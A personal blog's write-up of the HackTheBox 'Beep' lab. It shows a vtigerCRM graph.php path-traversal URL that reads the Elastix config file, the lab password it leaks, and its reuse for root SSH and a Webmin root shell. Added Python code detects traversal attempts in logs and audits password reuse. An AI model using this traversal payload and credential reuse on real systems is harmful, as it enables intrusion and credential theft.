N E T H R A N. W E D A G E


Cybersecurity undergraduate and web developer based in Sri Lanka, passionate about penetration testing, VAPT, and ethical hacking.


HTB: Beep

15 May 2024 Linux 20 pts Easy

Elastix / FreePBX server with multiple attack vectors. Exploited Local File Inclusion to grab credentials, then escalated to root via sudo misconfiguration.


HTB: Beep — Full Writeup

Beep runs Elastix — a Linux PBX system built on FreePBX and Asterisk. The most reliable path uses a Local File Inclusion vulnerability in vtigerCRM to leak credentials from the config file, then logs in directly as root via SSH — no privilege escalation needed.

Machine Info

  • OS: Linux (CentOS)
  • Difficulty: Easy
  • IP: 10.10.10.7
  • Key Vulnerability: Elastix 2.2.0 — LFI via vtigerCRM leading to credential disclosure

Step 1 — Enumeration

Start with a full Nmap scan to identify open ports and service versions:

nmap -sV -sC -p- --min-rate 5000 10.10.10.7

Key results from the scan:

  • Port 22 — OpenSSH 4.3
  • Port 25 — Postfix smtpd
  • Port 80 — Apache httpd (redirects to 443)
  • Port 110 — Cyrus pop3d
  • Port 143 — Cyrus imapd
  • Port 443 — HTTPS — Elastix login panel
  • Port 993 / 995 — IMAPS / POP3S
  • Port 3306 — MySQL
  • Port 10000 — Webmin httpd

The most interesting services are the Elastix panel on port 443, Webmin on port 10000, and SSH on port 22. Multiple exploitation paths exist on this box.

Step 2 — Web Enumeration

Run a directory scan against the Elastix panel — use -k to skip TLS certificate validation:

gobuster dir -u https://10.10.10.7 \
  -w /usr/share/wordlists/dirb/common.txt -k

Notable directories discovered:

  • /admin — FreePBX administration panel
  • /configs — configuration directory (403 Forbidden)
  • /recordings — FreePBX call recordings interface
  • /vtigercrm — vtiger CRM application

The /vtigercrm endpoint is the key finding — it contains a known Local File Inclusion vulnerability.

Step 3 — LFI via vtigerCRM

The graph.php file does not sanitise the current_language parameter before using it in a file include, and the trailing %00 null byte truncates the path so the script's own fixed suffix is ignored (a PHP null-byte issue fixed in 5.3.4). Use it to read /etc/amportal.conf via path traversal:

https://10.10.10.7/vtigercrm/graph.php
  ?current_language=../../../../../../../../etc/amportal.conf%00
  &module=Accounts&action

The response leaks the FreePBX configuration in plaintext:

AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE

The password jEhdIekWmdjE is reused across every service. PBX systems are frequently misconfigured with root SSH access enabled — try it immediately against port 22.
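Two defensive checks for the graph.php pattern just described, as an added example that is not code from the writeup or from vtigerCRM: an allowlist validator for a language parameter (the hardened form of the handling above), and a scanner that flags traversal and null-byte attempts against graph.php in Apache combined-format access logs. The log lines and the language allowlist are constructed assumptions.

```python
"""Added example, not code from the writeup or from vtigerCRM.

Two defensive checks for the graph.php pattern above: an allowlist validator
for a language parameter, and a scanner that flags traversal / null-byte
attempts against graph.php in Apache combined-format access logs.
The log lines and the language allowlist are constructed assumptions.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: the language packs this deployment actually ships.
ALLOWED_LANGUAGES = {"en_us", "de_de", "fr_fr"}

# Apache combined log: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def looks_like_traversal(value: str) -> bool:
    """True if the value carries a traversal sequence, a path separator or a
    NUL byte. It percent-decodes once itself, so a query value that parse_qs
    has already decoded is checked in double-encoded form as well."""
    decoded = unquote(value)
    return any(marker in decoded for marker in ("..", "/", "\\", "\x00"))


def safe_language(value: str) -> Optional[str]:
    """Hardened form of the parameter handling: accept only an exact
    allowlisted code, never a path fragment to be joined into an include."""
    if looks_like_traversal(value):
        return None
    return value if value in ALLOWED_LANGUAGES else None


def find_lfi_attempts(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client ip, status, decoded value) for every graph.php request
    whose current_language parameter looks like a traversal attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/graph.php"):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("current_language", []):
            if looks_like_traversal(value):
                hits.append((m.group("ip"), m.group("status"), value))
    return hits


# Constructed sample log lines (not captured from the box).
SAMPLE_LOG = [
    '10.10.14.5 - - [15/May/2024:10:12:01 +0000] "GET /vtigercrm/graph.php'
    '?current_language=../../../../../../../../etc/amportal.conf%00'
    '&module=Accounts&action HTTP/1.1" 200 2048',
    '10.10.14.5 - - [15/May/2024:10:12:03 +0000] "GET /vtigercrm/graph.php'
    '?current_language=en_us&module=Accounts&action HTTP/1.1" 200 512',
    '10.10.14.9 - - [15/May/2024:10:12:05 +0000] "GET /vtigercrm/graph.php'
    '?current_language=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.1" 200 1400',
    '10.10.14.9 - - [15/May/2024:10:13:00 +0000] "GET /admin/ HTTP/1.1" 302 -',
]

if __name__ == "__main__":
    for ip, status, value in find_lfi_attempts(SAMPLE_LOG):
        print(f"{ip} status={status} current_language={value!r}")
```

The status column matters when triaging hits: a 200 on a traversal request means the include most likely succeeded and the file contents went back to the client, whereas a 404 or 500 suggests the attempt failed. The validator rejects anything that is not an exact allowlisted code, which is the fix the vulnerable pattern needs; rejecting only ".." would still leave absolute paths and null bytes through.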

Step 4 — SSH as Root

OpenSSH 4.3 only offers key exchange and host key algorithms that modern clients disable by default, so they must be re-enabled for this host. Connect using:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \
    -oHostKeyAlgorithms=+ssh-dss root@10.10.10.7

Enter jEhdIekWmdjE when prompted. Verify the session:

id
uid=0(root) gid=0(root) groups=0(root)

Direct root — no privilege escalation needed.

Step 5 — Flags

With a root shell, grab both flags:

# User flag
cat /home/fanis/user.txt

# Root flag
cat /root/root.txt

Bonus — Webmin Root Shell

Webmin on port 10000 accepts the same root:jEhdIekWmdjE credentials. Navigate to Others > Command Shell for a root shell with no exploit required — pure credential reuse:

https://10.10.10.7:10000
# Log in as root / jEhdIekWmdjE
# Others > Command Shell

This is a reliable alternate path if SSH key exchange negotiation fails on certain client versions.

Key Takeaways

  • PBX systems expose large attack surfaces — enumerate every port
  • LFI in bundled apps like vtigerCRM can leak plaintext credentials
  • Password reuse across services is a critical misconfiguration
  • Legacy SSH servers need -oKexAlgorithms flags to connect
  • Always test recovered credentials against SSH as root
  • Multiple paths exist — LFI + SSH, Webmin, and Metasploit all work
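The takeaway about password reuse can be turned into a check. Below is an added example, not the writeup's own tooling, that parses an amportal.conf-style KEY=VALUE file and reports any secret shared between the MySQL, Asterisk manager and recordings accounts, or equal to its own username. The sample text and its placeholder passwords are constructed, not the values leaked above.

```python
"""Added example, not the writeup's own tooling: audit an amportal.conf-style
KEY=VALUE file for the credential reuse found on this box. The sample text
and its placeholder passwords are constructed, not the leaked values."""
from collections import defaultdict
from typing import Dict, List

# Secret keys in FreePBX's amportal.conf, paired with the account they belong to.
SECRET_TO_USER = {
    "AMPDBPASS": "AMPDBUSER",                    # MySQL
    "AMPMGRPASS": "AMPMGRUSER",                  # Asterisk manager interface
    "ARI_ADMIN_PASSWORD": "ARI_ADMIN_USERNAME",  # recordings web interface
}

# Constructed sample; on the real box all three shared one value.
SAMPLE_CONF = """\
# amportal.conf (constructed sample)
AMPDBUSER=asteriskuser
AMPDBPASS=placeholder-shared-secret
AMPMGRUSER=admin
AMPMGRPASS=placeholder-shared-secret
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=placeholder-shared-secret
AMPWEBROOT=/var/www/html
"""


def parse_conf(text: str) -> Dict[str, str]:
    """Parse KEY=VALUE lines, ignoring blanks and '#' comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip()] = value.strip()
    return conf


def audit(text: str) -> List[str]:
    """Return one finding per problem: a secret shared between services, or a
    secret equal to its own username."""
    conf = parse_conf(text)
    present = sorted(k for k in SECRET_TO_USER if k in conf)
    findings = []

    # Group the secret keys by their value; any group larger than one is reuse.
    by_value = defaultdict(list)
    for key in present:
        by_value[conf[key]].append(key)
    for keys in by_value.values():
        if len(keys) > 1:
            findings.append("same secret used for " + ", ".join(keys))

    # A secret identical to its username is guessable without any leak.
    for key in present:
        user_key = SECRET_TO_USER[key]
        if conf.get(user_key) is not None and conf[key] == conf[user_key]:
            findings.append(f"{key} equals the {user_key} value")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF) or ["no credential reuse found"]:
        print(finding)
```

Run against the real file on a PBX host this reports exactly the condition that made Beep fall: one value serving three services. Separate secrets per service limit what a single leaked config file gives away; restricting root logins in sshd_config closes the second half of the chain independently.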

Tools Used

  • nmap — port scanning and service enumeration
  • gobuster — web directory enumeration
  • browser / curl — LFI via vtigerCRM graph.php
  • ssh — direct root login with recovered credentials
  • Webmin — alternate root shell via command interface
  • Metasploit — exploit/multi/http/elastix_graph_php_lfi
  • netcat — reverse shell listener